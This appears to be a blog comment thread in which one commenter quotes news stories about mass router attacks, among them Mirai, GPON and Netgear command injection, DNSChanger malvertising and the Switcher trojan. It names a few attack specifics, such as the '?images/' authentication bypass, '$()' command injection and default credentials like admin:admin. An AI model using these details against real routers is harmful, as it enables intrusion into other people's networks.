http://www.theregister.co.uk/2016/10/19/home_router_insecurity/
It is not just IoT devices that are hacked en masse. Home routers are hit also with their flaws.
http://www.theregister.co.uk/2016/10/19/home_router_insecurity/
It is not just IoT devices that are hacked en masse. Home routers are hit also with their flaws.
51 Comments
Tomi Engdahl says:
Low-Bandwidth “BlackNurse” DDoS Attacks Can Disrupt Firewalls
http://www.securityweek.com/low-bandwidth-blacknurse-ddos-attacks-can-disrupt-firewalls
Some attacks based on the Internet Control Message Protocol (ICMP) can cause serious disruptions even over low
bandwidths.
ICMP attacks, also known as ping flood attacks, are highly common, but they typically rely on Type 8 Code 0 packets.
The attacks, dubbed by the company “BlackNurse,” can be highly effective even at bandwidths as low as 15-18 Mbps and
they can cause disruptions to firewalls even if the victim has an Internet connection of 1 Gbps.
“The impact we see on different firewalls is typically high CPU loads. When an attack is ongoing, users from the LAN
side will no longer be able to send /receive traffic to/from the Internet. All firewalls we have seen recover when
the attack stops,” TDC explained in a report detailing BlackNurse attacks.
A scan of the Danish IP address space revealed that there were over 1.7 million devices responding to ICMP pings,
which means these attacks can have a significant impact.
Researchers have so far confirmed that BlackNurse attacks work against Cisco ASA and SonicWall firewalls, but they
likely also affect products from Palo Alto Networks and other vendors. The Iptables firewall utility for Linux,
MikroTik products and OpenBSD are not affected.
Detection rules and proof-of-concept (PoC) code have been made available to allow users to identify attacks and test
their equipment.
http://soc.tdc.dk/blacknurse/blacknurse.pdf
Tomi Engdahl says:
Home Routers a Big Consumer Cyberthreat?
http://www.epanorama.net/newepa/2014/02/20/home-routers-a-big-consumer-cyberthreat/
Tomi Engdahl says:
‘Likely Hacker Attack’ Hits Almost 1 Million German Homes
http://www.securityweek.com/likely-hacker-attack-hits-almost-1-million-german-homes
Internet service for almost one million households in Germany was disrupted by likely deliberate hacking, provider Deutsche Telekom said Monday.
Around 900,000 customers using specific models of router have been affected since Sunday afternoon, the firm said, with some unable to connect at all while others suffered intermittent problems.
“We believe that influence was exerted on the routers from outside,” a Telekom spokesman told AFP, saying software had been installed on the devices that prevented them from connecting to the company’s network.
It did not provide details of which models of router — network hardware that connects households to their internet and telephone service provider — were affected.
Deutsche Telekom said that its engineers and colleagues from the companies that produce the devices had been working through the night to find a solution.
Customers affected have been advised to disconnect their routers from the network since the problems began on Sunday afternoon.
Germany has been the target of repeated cyber attacks in recent years.
Tomi Engdahl says:
German ISP Confirms Malware Attacks Caused Disruptions
http://www.securityweek.com/german-isp-confirms-malware-attacks-caused-disruptions
German telecommunications giant Deutsche Telekom has confirmed that more than 900,000 of its 20 million fixed-line network customers experienced Internet disruptions due to malware attacks on their routers.
In a press statement released on Monday, Deutsche Telekom said malicious actors had been trying to infect routers with malware, but the attempts failed, which led to 4-5 percent of devices crashing and preventing owners from going online.
Since the malware only resides in the router’s memory, customers have been advised to reboot their devices in order to clean the infection. Deutsche Telekom has also released a firmware update that should prevent infections on its Speedport routers.
Germany’s Federal Office for Information Security (BSI) reported that some government networks protected by the organization were also targeted in attacks. These attacks were mitigated by the existing protection mechanisms, the BSI said.
Attacks have been observed in several countries. Researchers determined that a piece of malware based on Mirai, whose source code was leaked recently, has been using port 7547 to hijack routers and modems.
Tomi Engdahl says:
100,000 UK Routers Likely Affected by Mirai Variant
http://www.securityweek.com/100000-uk-routers-likely-affected-mirai-variant
Approximately 100,000 UK TalkTalk and Post Office ISP users were affected by the recent Mirai attack that severely affected nearly a million Deutsche Telekom customers in Germany in late November. It was assumed that the UK victims were the outer ripples of the primary attack; and this was confirmed by a subsequent report that quoted the Mirai developer as apologizing for the effect on the Post Office. The UK disruption was apparently an accident and not done intentionally.
This version of events is now questioned by the findings of Pen Test Partners. Senior consultant Andrew Tierney reported Friday that the effect on TalkTalk routers was different to the effect on Deutsche Telekom routers. “We can’t see what is causing the claimed ISP outages for TalkTalk and the Post Office reported in the press. It shouldn’t stop the router routing, and as of yet, the bots haven’t taken part in any attacks.”
Pen Test Partners concluded, “Whilst the spread and purpose of the bot net is similar to Mirai, there are enough differences with this variant that it should really get a new name.”
TR-064 worm. It’s not Mirai and the outages are interesting
https://www.pentestpartners.com/blog/tr-064-worm-its-not-mirai-and-the-outages-are-interesting/
We’ve been looking at the code behind the worm that’s exploiting TalkTalk, PostOffice and many other Zyxel routers using the Allegro RomPager HTTP server.
What’s odd is that we can’t currently see why it’s causing outages, other than perhaps collapsing under the congestion of scanning for more vulnerable routers.
The vulnerability is fairly simple, and relies on a series of mistakes.
Port 7547 is open on these routers to listen for a “knock” to tell them to connect back to a provisioning server. It’s meant to be exposed to the WAN side of the router. This is part of TR-069, which has been discussed a lot in the past.
Curiously, it also appears that TR-064 is also available on port 7547. TR-064 is called “LAN-Side DSL CPE Configuration”, and unsurprisingly, is only meant to be exposed on the LAN side of the router.
The TR-064 specification requires authentication, but this seems to be missing.
Tomi Engdahl says:
TalkTalk’s wi-fi hack advice is ‘astonishing’
http://www.bbc.com/news/technology-38223805
TalkTalk’s handling of a wi-fi password breach is being criticised by several cyber-security experts.
The BBC has presented the company with evidence that many of its customers’ router credentials have been hacked, putting them at risk of data theft.
The UK broadband provider confirmed that the sample of stolen router IDs it had been shown was real.
But it is still advising users that there is “no need” to change their routers’ settings.
A cyber-security advisor to Europol said he was astounded by the decision.
“If TalkTalk has evidence that significant numbers of passwords are out in the wild, then at the very least they should be advising their customers to change their passwords,” said the University of Surrey’s Prof Alan Woodward.
“To say they see no need to do so is, frankly, astonishing.”
A spokeswoman for TalkTalk said that customers could change their settings “if they wish” but added that she believed there was “no risk to their personal information”.
She referred the BBC to another security expert. But when questioned, he also said the company should change its advice.
The BBC was subsequently contacted by someone who said he had access to a database of 57,000 router IDs that had been scraped before any fix had been rolled out.
He did not reveal his identity, but agreed to share a sample of the credentials that had been harvested.
The list contained details of about 100 routers including:
their service set identifier (SSID) codes and media access control (MAC) addresses. These can be entered into online tools that reveal the physical location of the routers
the router passwords, which would allow someone who travelled to the identified property to access the wi-fi network
The source said he wanted to highlight the problem because other more malevolent actors might have carried out a similar operation.
Prof Alan Woodward said once a hacker was outside a vulnerable property, they could:
snoop in the resident’s data, which might be clearly visible or encrypted in ways that still allowed the original information to be easily recovered
use the internet connection to mount an onward attack. The hacker could do this to hide their own identity or to co-opt the router to join an army of other compromised equipment in later DDoS (distributed denial of service) attacks
log in to the router as the administrator and mount a “man in the middle attack”, where apparently secure communications could be listened in on
substitute the router’s firmware with a modified version that provided a backdoor for later access even if the device was reset
‘Fast and loose’
TalkTalk’s spokeswoman referred the BBC to Steve Armstrong, a cyber-security instructor that she said would support it on the matter.
He said the risk to an individual user was relatively low.
“If you look at the average home user and what is on their home network, that would be exposed to an attacker,… then there is not a great deal.
“The risk is probably no higher than using a [coffee shop's] open wi-fi network.”
But he added that he still felt TalkTalk was giving the wrong advice.
“Part of my pushback to them is that they should be telling people, ‘You need to change your password,’” he said.
Tomi Engdahl says:
Hacker Claims To Push Malicious Firmware Update to 3.2 Million Home Routers
https://motherboard.vice.com/read/hacker-claims-to-push-malicious-firmware-update-to-32-million-home-routers
One of the hackers who amassed a new massive army of zombie internet-connected devices that can launch disruptive cyberattacks—even by mistake—now claims to have taken control of 3.2 million home routers, taking advantage of a flaw that allowed anyone to connect to them.
On Monday, the cybercriminal, who calls himself BestBuy, claimed to have set up a server that would automatically connect to vulnerable routers and push a malicious firmware update to them. This, he said, would grant him persistent access and the ability to lock out the owners as well as internet providers and device manufacturers.
“They are ours, even after reboot. They will not accept any new firmware from [Internet Service Provider] or anyone, and connect back to us every time :),” BestBuy said in an online chat. “Bots that cannot die until u throw device into the trash.”
Yet, they all agreed that BestBuy’s story was plausible, and potentially really bad news for the routers’ owners as well as their internet providers.
“Jesus christ,” said Darren Martyn, a security researcher who’s been tracking the recent wave of cyberattacks coming from hacked Internet of Things devices infected with Mirai. “Assuming [the hackers] didn’t fuck up repacking the firmware, and they didn’t do anything spectacularly stupid when backdooring it, their firmware backdoors will probably work just fine.”
None of the security researchers I contacted, however, could find one of the hacked routers in the wild.
“[It] would mean patching firmware for each different model and possibly even for each ISP,” he told Motherboard in an online chat. “Some firmware takes 15 minutes to patch, other can take days. But it is easy to mess up.”
Tomi Engdahl says:
Lucian Constantin / PCWorld:
Many models of Netgear routers exposed to critical remotely-exploitable security flaw; affected users recommended to stop using routers until patch is available
Nasty unpatched vulnerability exposes Netgear routers to easy hacking
The flaw allows hackers to execute arbitrary shell commands on affected devices.
http://www.pcworld.com/article/3149554/security/an-unpatched-vulnerability-exposes-netgear-routers-to-hacking.html
Several models of Netgear routers are affected by a publicly disclosed vulnerability that could allow hackers to take them over.
An exploit for the vulnerability was published Friday by a researcher who uses the online handle Acew0rm. He claims that he reported the flaw to Netgear in August, but didn’t hear back.
The issue stems from improper input sanitization in a form in the router’s web-based management interface and allows the injection and execution of arbitrary shell commands on an affected device.
The U.S. CERT Coordination Center (CERT CC) at Carnegie Mellon University rated the flaw as critical, assigning it a score of 9.3 out of 10 in the Common Vulnerability Scoring System (CVSS).
Netgear confirmed the vulnerability over the weekend and said that its R7000, R6400 and R8000 routers might be vulnerable. However, another researcher performed a test and reported that other routers from Netgear’s Nighthawk line are also affected. These include: R7000, R7000P, R7500, R7800, R8500 and R9000.
Since the vulnerability can be exploited with an HTTP request that doesn’t require authentication, hackers can attack the affected routers using cross-site request forgery attacks (CSRF). This works even when the routers don’t have their management interfaces exposed to the Internet.
CSRF attacks hijack users’ browsers when visiting specifically crafted webpages and send unauthorized requests through them. This makes it possible for a malicious website to force a user’s browser to exploit the router over the LAN.
CERT CC recommends that users stop using the affected routers until an official patch becomes available, if they can do so. However, there is a workaround that involves exploiting the flaw to stop the router’s web server and prevent future attacks.
Tomi Engdahl says:
Lucian Constantin / PCWorld:
Many models of Netgear routers exposed to critical remotely-exploitable security flaw; affected users recommended to stop using routers until patch is available
Nasty unpatched vulnerability exposes Netgear routers to easy hacking
The flaw allows hackers to execute arbitrary shell commands on affected devices.
http://www.pcworld.com/article/3149554/security/an-unpatched-vulnerability-exposes-netgear-routers-to-hacking.html
Several models of Netgear routers are affected by a publicly disclosed vulnerability that could allow hackers to take them over.
An exploit for the vulnerability was published Friday by a researcher who uses the online handle Acew0rm. He claims that he reported the flaw to Netgear in August, but didn’t hear back.
The issue stems from improper input sanitization in a form in the router’s web-based management interface and allows the injection and execution of arbitrary shell commands on an affected device.
Tomi Engdahl says:
Hacker shows how easy it is to take over a city’s public Wi-Fi network
A buffer overflow in a single router model could have endangered thousands of Wi-Fi users
http://www.pcworld.com/article/3140627/security/hacker-shows-how-easy-it-is-to-take-over-a-citys-public-wi-fi-network.html
In a perfect example of how public wireless networks can be dangerous for privacy and security, an Israeli hacker showed that he could have taken over the free Wi-Fi network of an entire city.
On his way home from work one day, Amihai Neiderman, the head of research at Israeli cybersecurity firm Equus Technologies, spotted a wireless hotspot that he hadn’t seen before. What made it unusual was that it was in an area with no buildings.
It turned out that the hotspot he saw, advertised as “FREE_TLV,” was part of the citywide free Wi-Fi network set up by the local administration of Tel Aviv, Israel. This made Neiderman wonder: How secure is it?
Tomi Engdahl says:
TP-Link Debug Protocol Gives Up Keys To Kingdom
http://hackaday.com/2016/12/14/tp-link-debug-protocol-give-up-keys-to-kingdom/
Andres] wanted to install a custom OS firmware on a cheap home router, so he bought a router known to be reflashable only to find that the newer version of the firmware made that difficult. We’ve all been there.
This is not a weekend hack — this took a professional many hours of serious labor. But it was made a lot easier because TP-Link left a debugging protocol active, listening on the LAN interface, and not requiring authentication.
(It’s not a bug, it’s a feature!) But still, this is an awesome hack!
Tomi Engdahl says:
Malvertising Campaign Infects Your Router Instead of Your Browser
https://it.slashdot.org/story/16/12/14/2059217/malvertising-campaign-infects-your-router-instead-of-your-browser
Malicious ads are serving exploit code to infect routers, instead of browsers, in order to insert ads in every site users are visiting. Unlike previous malvertising campaigns that targeted users of old Flash or Internet Explorer versions, this campaign focused on Chrome users, on both desktop and mobile devices. The malicious ads included in this malvertising campaign contain exploit code for 166 router models, which allow attackers to take over the device and insert ads on websites that didn’t feature ads, or replace original ads with the attackers’ own. Researchers haven’t yet managed to determine an exact list of affected router models, but some of the brands targeted by the attackers include Linksys, Netgear, D-Link, Comtrend, Pirelli, and Zyxel.
Malvertising Campaign Infects Your Router Instead of Your Browser
https://www.bleepingcomputer.com/news/security/malvertising-campaign-infects-your-router-instead-of-your-browser/
Exploit kit searches for vulnerable routers, not browsers or Flash installs
The way this entire operation works is by crooks buying ads on legitimate websites. The attackers insert malicious JavaScript in these ads, which use a WebRTC request to a Mozilla STUN server to determine the user’s local IP address.
Based on this local IP address, the malicious code can determine if the user is on a local network managed by a small home router, and continue the attack. If this check fails, the attackers just show a random legitimate ad and move on.
For the victims the crooks deem valuable, the attack chain continues. These users receive a tainted ad which redirects them to the DNSChanger EK home, where the actual exploitation begins.
The next step is for the attackers to send an image file to the user’s browser, which contains an AES (encryption algorithm) key embedded inside the photo using the technique of steganography.
The malicious ad uses this AES key to decrypt further traffic it receives from the DNSChanger exploit kit. Crooks encrypt their operations to avoid the prying eyes of security researchers.
Malvertising campaign targets 166 router models
After the user receives his encryption key, the DNSChanger exploit kit sends each victim a list of router “fingerprints.” Proofpoint researchers say they’ve seen the exploit kit serving 166 router fingerprints at the time of writing.
The malicious ad uses these fingerprints to test the router type the user is using, and then report back to the exploit kit’s server.
The DNSChanger EK replies back with exploit packages that can take over the router and change its DNS settings in order to relay traffic through the crooks’ servers.
Attackers use compromised routers to replace ads in the user’s normal traffic
Once the attack has gained control over the router, he can use it to replace legitimate ads with his own, or add advertisements on websites that didn’t feature ads.
While previous malvertising campaigns usually targeted users of Internet Explorer, this campaign focused on Chrome users, on both desktop and mobile devices. Ad replacement and insertion also takes place on traffic to mobile devices, not just desktops.
Updating router firmware is the recommended course of action
Because the attack is carried out via the user’s browser, using strong router passwords or disabling the administration interface is not enough.
The only way users can stay safe is if they update their router’s firmware to the most recent versions, which most likely includes protection against the vulnerabilities used by the DNSChanger EK.
Tomi Engdahl says:
Malvertising Campaign Targets Routers
http://www.securityweek.com/malvertising-campaign-targets-routers
A recently observed malvertising campaign is focused on compromising user’s home routers rather than exploiting vulnerabilities in their browsers.
Carried out by the actors behind the DNSChanger exploit kit (EK), the campaign doesn’t target browser or device vulnerabilities, but attempts to infect home or small office (SOHO) routers instead. The attackers use an improved version of the DNSChanger, which usually works through the Chrome browser on Windows desktops and Android devices, Proofpoint security researchers reveal.
Once the targeted router has been compromised, however, users are exposed to further malvertising, regardless of the device, operating system, or browser they use. The security researchers also note that the attacks on routers happen in waves likely associated with ongoing malvertising campaigns lasting several days, and they appear related to the “CSRF (Cross-Site Request Forgery) Soho Pharming” operations in the first half of 2015.
The campaign has grown from 55 fingerprints last year to 166, some of which are working for several router models, and the malvertising chain is now accepting Android devices as well, the security researchers explain.
Tomi Engdahl says:
“Switcher” Android Trojan Hacks Routers, Hijacks Traffic
http://www.securityweek.com/switcher-android-trojan-hacks-routers-hijacks-traffic
Researchers at Kaspersky Lab have come across a new Android Trojan that hacks routers and changes their DNS settings in an effort to redirect traffic to malicious websites.
Dubbed “Switcher,” the malware has been disguised as an Android client for the Chinese search engine Baidu, and a Chinese app for sharing Wi-Fi network details. Once users install one of these apps, the malware attempts to guess the username and password of the Wi-Fi router the infected Android device is connected to.
Switcher includes a list of more than two dozen username and password combinations that could allow it to access the router’s web administration interface, such as admin:admin, admin:123456, or admin:00000000.
“With the help of JavaScript it tries to login using different combinations of logins and passwords. Judging by the hardcoded names of input fields and the structures of the HTML documents that the trojan tries to access, the JavaScript code used will work only on web interfaces of TP-LINK Wi-Fi routers,” Nikita Buchka, mobile security expert at Kaspersky Lab, said in a blog post.
Switcher: Android joins the ‘attack-the-router’ club
https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/
Recently, in our never-ending quest to protect the world from malware, we found a misbehaving Android trojan. Although malware targeting the Android OS stopped being a novelty quite some time ago, this trojan is quite unique. Instead of attacking a user, it attacks the Wi-Fi network the user is connected to, or, to be precise, the wireless router that serves the network. The trojan, dubbed Trojan.AndroidOS.Switcher, performs a brute-force password guessing attack on the router’s admin web interface. If the attack succeeds, the malware changes the addresses of the DNS servers in the router’s settings, thereby rerouting all DNS queries from devices in the attacked Wi-Fi network to the servers of the cybercriminals (such an attack is also known as DNS-hijacking). So, let us explain in detail how Switcher performs its brute-force attacks, gets into the routers and undertakes its DNS-hijack.
Tomi Engdahl says:
Hacker Claims To Push Malicious Firmware Update to 3.2 Million Home Routers
https://motherboard.vice.com/read/hacker-claims-to-push-malicious-firmware-update-to-32-million-home-routers
One of the hackers who amassed a new massive army of zombie internet-connected devices that can launch disruptive cyberattacks—even by mistake—now claims to have taken control of 3.2 million home routers, taking advantage of a flaw that allowed anyone to connect to them.
On Monday, the cybercriminal, who calls himself BestBuy, claimed to have set up a server that would automatically connect to vulnerable routers and push a malicious firmware update to them. This, he said, would grant him persistent access and the ability to lock out the owners as well as internet providers and device manufacturers.
“They are ours, even after reboot. They will not accept any new firmware from [Internet Service Provider] or anyone, and connect back to us every time :),” BestBuy said in an online chat. “Bots that cannot die until u throw device into the trash.”
Tomi Engdahl says:
Hundreds of Thousands of Netgear Routers Vulnerable to Password Bypass
https://threatpost.com/hundreds-of-thousands-of-netgear-routers-vulnerable-to-password-bypass/123462/
Hundreds of thousands–potentially more than one million–Netgear routers are susceptible to a pair of vulnerabilities that can lead to password disclosure.
Researchers said that while anyone who has physical access to a router can exploit the vulnerabilities locally, the real threat is that the flaw can also be exploited remotely.
the vulnerabilities can be remotely exploited if the router’s remote management option is enabled.
While Netgear claims remote management is turned off on routers by default, Kenin said there are “hundreds of thousands, if not over a million” devices left remotely accessible.
Tomi Engdahl says:
FYI: You can blow Intel-powered broadband modems off the ‘net with a ‘trivial’ packet stream
All too easy to choke enemies’ gateways, it seems
https://www.theregister.co.uk/2017/04/27/intel_puma6_chipset_trivial_to_dos/
Broadband modems using Intel’s bungled Puma 6 chipset can be overloaded and virtually knocked offline by a trivial stream of packets, it is claimed.
Effectively, if there’s someone you don’t like, and they are one of thousands upon thousands of people using a Puma 6-powered home gateway, and you know their IP address, you can kick them off the internet, we’re told.
This week, inquisitive netizens discovered that, when presented with even modest amounts of packets – as little as 1.5Mbps – modems equipped with a Puma 6 can be slowed to a crawl.
According to one engineer who spoke to El Reg on the issue, the flaw would be “trivial” to exploit in the wild and would effectively render the targeted box useless for the duration.
“You send a stream of 200Kbps of TCP, UDP or maybe even ICMP to different port numbers and it has a tiny table to keep track of these and become immd unresponsive. It comes back after you stop,” our tipster explains.
“It can be exploited remotely and there is no way to mitigate the issue.”
This will be particularly frustrating for Puma 6 modem owners because the boxes are pitched as gigabit internet modems
The Puma 6 chipset is used in a number of ISP-branded cable modems
Tomi Engdahl says:
Mirai Variant “Satori” Targets Huawei Routers
http://www.securityweek.com/mirai-variant-satori-targets-huawei-routers
Hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers have been observed over the past month, Check Point security researchers warn.
The attacks were trying to drop Satori, an updated variant of the notorious Mirai botnet that managed to wreak havoc in late 2016. Targeting port 37215 on Huawei HG532 devices, the assaults were observed all around the world, including the USA, Italy, Germany and Egypt, the researchers say.
Common to these incidents was the attempt to exploit CVE-2017-17215, a zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed and intended for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).
The affected device supports a service type named `DeviceUpgrade`, which is supposedly carrying out firmware upgrade actions. By injecting shell meta-characters “$()” in two elements with which the upgrade is carried out, a remote administrator could execute arbitrary code on the affected devices.
Tomi Engdahl says:
Flaws Affecting Top-Selling Netgear Routers Disclosed
http://www.securityweek.com/flaws-affecting-top-selling-netgear-routers-disclosed
Security firm Trustwave has disclosed the details of several vulnerabilities affecting Netgear routers, including devices that are top-selling products on Amazon and Best Buy.
The flaws were discovered by researchers in March 2017 and they were patched by Netgear in August, September and October.
One of the high severity vulnerabilities has been described as a password recovery and file access issue affecting 17 Netgear routers and modem routers, including best-sellers such as R6400, R7000 (Nighthawk), R8000 (Nighthawk X6), and R7300DST (Nighthawk DST).
Tomi Engdahl says:
A LONG-AWAITED IOT CRISIS IS HERE, AND MANY DEVICES AREN’T READY
https://www.wired.com/story/upnp-router-game-console-vulnerabilities-exploited
YOU KNOW BY now that Internet of Things devices like your router are often vulnerable to attack, the industry-wide lack of investment in security leaving the door open to a host of abuses. Worse still, known weaknesses and flaws can hang around for years after their initial discovery. Even decades. And Monday, the content and web services firm Akamai published new findings that it has observed attackers actively exploiting a flaw in devices like routers and video game consoles that was originally exposed in 2006.
Over the last decade, reports have increasingly detailed the flaws and vulnerabilities that can plague insecure implementations of a set of networking protocols called Universal Plug and Play. But where these possibilities were largely academic before, Akamai found evidence that attackers are actively exploiting these weaknesses not to attack the devices themselves, but as a jumping off point for all sorts of malicious behavior, which could include DDoS attacks, malware distribution, spamming/phishing/account takeovers, click fraud, and credit card theft.
“We started talking about how many of these vulnerable devices are out there and what can they be leveraged for, because most people seem to have forgotten about this vulnerability,”
Down With UPnP
UPnP helps devices on a network find and essentially introduce themselves to each other, so that a server, say, can discover and vet the printers on a network.
When IoT devices expose too many of these mechanisms to the open internet without requiring authentication—or when credential checks are easily guessable or can be brute forced—attackers can then scan for devices that have implemented a few of these protocols badly all in one device, and then exploit this series of manufacturer missteps to launch an attack.
That’s also how the Akamai researchers found the malicious UPnP proxy schemes. Akamai says it found 4.8 million devices on the open internet that would improperly return a certain query related to UPnP. Of those, about 765,000 also had a secondary implementation issue that created a bigger network communication vulnerability. And then on more than 65,000 of those, Akamai saw evidence that attackers had exploited the other weaknesses to inject one or more malicious commands into the router mechanism that controls traffic flow. Those final 65,000 devices were grouped together in various ways and ultimately pointed to 17,599 unique IP addresses for attackers to bounce traffic around to mask their movements.
“In particular it’s annoying to build these attacks against hundreds of personal routers, and testing these attacks is hard too,”
Notably, the Akamai researchers saw evidence that UPnP proxying isn’t just being used for malicious activity. It also seems to be part of efforts to skirt censorship schemes in countries like China to gain unfettered web access.
Users won’t realize if their devices are being exploited for UPnP proxy attacks, and there is little they can do to defend themselves if they have a vulnerable device besides getting a new one. Some devices will allow users to disable UPnP, but that can lead to functionality issues.
Akamai found 73 brands and almost 400 IoT models that are vulnerable in some way.
Internet of Threats
Internet of Things security is still not enough of a priority-A big part of the problem is that every device is a black box, we don’t know what code these things are running and it’s all proprietary (aka unvetted)
Tomi Engdahl says:
Cisco Switches in Iran, Russia Hacked in Apparent Pro-US Attack
https://www.securityweek.com/cisco-switches-iran-russia-hacked-apparent-pro-us-attack
A significant number of Cisco switches located in Iran and Russia have been hijacked in what appears to be a hacktivist campaign conducted in protest of election-related hacking. However, it’s uncertain if the attacks involve a recently disclosed vulnerability or simply abuse a method that has been known for more than a year.
Tomi Engdahl says:
Multi-Purpose Proxy Botnet Ensnares 65,000 Routers
https://www.securityweek.com/multi-purpose-proxy-botnet-ensnares-65000-routers
More than 65,000 routers exposed to the Internet via the Universal Plug and Play (UPnP) protocol are being abused by cybercriminals as part of a large, multi-purpose proxy botnet, Akamai has discovered.
The vulnerable devices were found to have NAT injections that allow malicious actors to abuse them for various purposes, such as bypassing censorship, spamming and phishing, click fraud, account takeover and credit card fraud, distributed denial of service (DDoS) attacks, malware distribution, and more.
The 65,000 injected devices, Akamai reveals, are part of a larger set of over 4.8 million devices that were found to be vulnerable to simple UDP SSDP (the UDP portion of UPnP) inquiries. Around 765,000 of the devices were also found to expose their vulnerable TCP implementations, the security firm says.
Tomi Engdahl says:
Hackers Target Flaws Affecting a Million Internet-Exposed Routers
https://www.securityweek.com/hackers-target-flaws-affecting-million-internet-exposed-routers
Just a few days after they were disclosed, malicious actors started targeting a couple of flaws affecting routers made by South Korea-based Dasan Networks. There are roughly one million potentially vulnerable devices accessible directly from the Internet.
vpnMentor on Monday disclosed the details of two vulnerabilities in Gigabit-capable Passive Optical Network (GPON) routers made by Dasan and distributed to users by ISPs that provide fiber-optic Internet.
One of the flaws (CVE-2018-10561) allows a remote attacker to bypass a router’s authentication mechanism simply by appending the string “?images/” to a URL in the device’s web interface. The second vulnerability (CVE-2018-10562) can be exploited by an authenticated attacker to inject arbitrary commands.
https://www.securityweek.com/over-million-dasan-routers-vulnerable-remote-hacking
Tomi Engdahl says:
Botnets ‘competing’ to attack vulnerable GPON fiber routers
Vulnerable fiber internet routers now under attack from competing botnet herders.
https://www.zdnet.com/article/botnets-competing-to-attack-vulnerable-gpon-fiber-routers/
Several botnet operators are targeting a popular but vulnerable fiber router, which can be easily hijacked thanks to two authentication bypass and command injection bugs.
ZDNet first reported the bugs last week. In case you missed it: two bugs allowed anyone to bypass the router’s login page and access pages within — simply by adding “?images/” to the end of the web address on any of the router’s configuration pages. With near complete access to the router, an attacker can inject their own commands, running with the highest “root” privileges.
In other words, these routers are prime targets for hijacking by botnet operators.
Now, a new report by China-based security firm Netlab 360 says at least five botnet families have been “competing for territory” to target the devices.
All five botnets — Muhstik, Mirai, Hajime, Satori, and Mettle — have developed exploits to target the fiber routers, but so far none of the botnets have successfully hacked and hijacked the routers.
Tomi Engdahl says:
Mirai botnet adds three new attacks to target IoT devices
https://www.zdnet.com/article/mirai-botnet-adds-three-new-attacks-to-target-iot-devices/
This new version of the botnet uses exploits instead of brute force attacks to gain control of unpatched devices.
A new variant of the Mirai botnet has added at least three exploits to its arsenal, which enable it to target additional IoT devices, including routers and DVRs.
The new version of Mirai – a powerful cyberattack tool which took down large swathes of the internet across the US and Europe in late-2016 – has been uncovered by researchers at security company Fortinet, who have dubbed it Wicked after lines in the code.
The original version of Mirai was deployed to launch massive distributed denial-of-service (DDoS) attacks, but has also been modified for other means after its source code was published online including to turn unpatched IoT devices into crytocurrency miners and proxy servers for delivering malware.
While the original Mirai uses traditional brute force attacks in an attempt to gain control of IoT devices, Wicked uses known and available exploits in order to do its work. Many of these are old, but the inability of many IoT devices to actually install updates means they haven’t been secured against known exploits.
Vulnerabilities used by Wicked include a Netgear R7000 and R64000 Command Injection (CVE-2016-6277), a CCTV-DVR Remote Code Execution and an Invoker shell in compromised web servers.
Tomi Engdahl says:
DASAN GPON home routers exploits in-the-wild
https://isc.sans.edu/forums/diary/DASAN+GPON+home+routers+exploits+inthewild/23677/
Beginning of May, 2 vulnerabilities with exploits were released for DASAN GPON home routers: CVE 2018-10561 and CVE 2018-10562. The first vulnerability allows unauthenticated access to the Internet facing web interface of the router, the second vulnerability allows command injection.
Tomi Engdahl says:
Attackers Change DNS Settings of DrayTek Routers
https://www.securityweek.com/attackers-change-dns-settings-draytek-routers
Attackers have been targeting a zero-day vulnerability in routers made by DrayTek to change their DNS settings and likely abuse them in future attacks.
The Taiwan-based manufacturer of broadband Customer Premises Equipment (CPE) has already acknowledged the problem and has issued a firmware update to address it.
According to the company, the security vulnerability impacts the web administration feature, allowing for an attacker “to intercept or create an administration session and change settings on your router.”
The altering of DNS settings on routers is likely the initial phase of a larger attack, where users would be redirected to rogue DNS servers and fake websites. Thus, cybercriminals can harvest usernames and passwords, steal sensitive information such as banking credentials, or serve malicious applications to unsuspecting users.
“Shodan shows there are nearly 800,000 Draytek routers worldwide, so the vulnerability provides a big opportunity for malicious redirections which could result in people and businesses losing credentials, data and ultimately money,” Sion Lloyd, Researcher at Nominet, told SecurityWeek in an emailed comment.
Tomi Engdahl says:
Jim Finkle / Reuters:
Cisco’s Talos cyber intelligence unit says 500K+ routers in dozens of countries have been infected by Russia-linked malware and could be used to attack Ukraine — (Reuters) – Cisco Systems Inc (CSCO.O) on Wednesday warned that hackers have infected at least 500,000 routers and storage devices …
Cyber researchers, Ukraine warn of possible Russian attack
https://www.reuters.com/article/us-cyber-routers-ukraine/cyber-firms-warn-on-suspected-russian-plan-to-attack-ukraine-idUSKCN1IO1U9
Hackers have infected at least 500,000 routers and storage devices in dozens of countries, some of the world’s biggest cyber security firms warned on Wednesday, in a campaign that Ukraine said was preparation for a future Russian cyber attack.
The U.S. Department of Homeland Security said it was investigating the malware, which targets devices from Linksys, MikroTik, Netgear Inc (NTGR.O), TP-Link and QNAP, advising users to install security updates.
Tomi Engdahl says:
Botnets Target Zero-Days in GPON Routers
https://www.securityweek.com/botnets-target-zero-days-gpon-routers
Two unpatched vulnerabilities in Dasan’s Gigabit-capable Passive Optical Network (GPON) routers are being exploited by Internet of Things (IoT) botnets, security researchers warn.
Tracked as CVE-2018-10561 and CVE-2018-10562, the two vulnerabilities were publicly disclosed in early May and impact hundreds of thousands of devices. The flaws can be exploited remotely, providing an attacker with full control of the impacted devices.
According to researchers from Qihoo 360 Netlab, there were five botnets targeting the two GPON vulnerabilities last week, namely Hajime, Mettle, Mirai, Muhstik, and Satori.
Now, the security researchers reveal that an older botnet called TheMoon has joined the GPON party as well.
Tomi Engdahl says:
How insecure is your router?
https://opensource.com/article/18/5/how-insecure-your-router?sc_cid=7016000000127ECAAY
Your router is your first point of contact with the internet. How much is it increasing your risk?
Tomi Engdahl says:
How insecure is your router?
https://opensource.com/article/18/5/how-insecure-your-router
Your router is your first point of contact with the internet. How much is it increasing your risk?
Tomi Engdahl says:
7,500+ MikroTik Routers Are Forwarding Owners’ Traffic to the Attackers, How is Yours?
https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/
Each RouterBOARD device runs the RouterOS software system.[1]
According to WikiLeaks, the CIA Vault7 hacking tool Chimay Red involves 2 exploits, including Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.[2]
Both Winbox and Webfig are RouterOS management components
Since Mid-July, our Anglerfish Honeypot System has been picking up malware exploiting the above MikroTik CVE-2018-14847 vulnerability to perform various malicious activities.
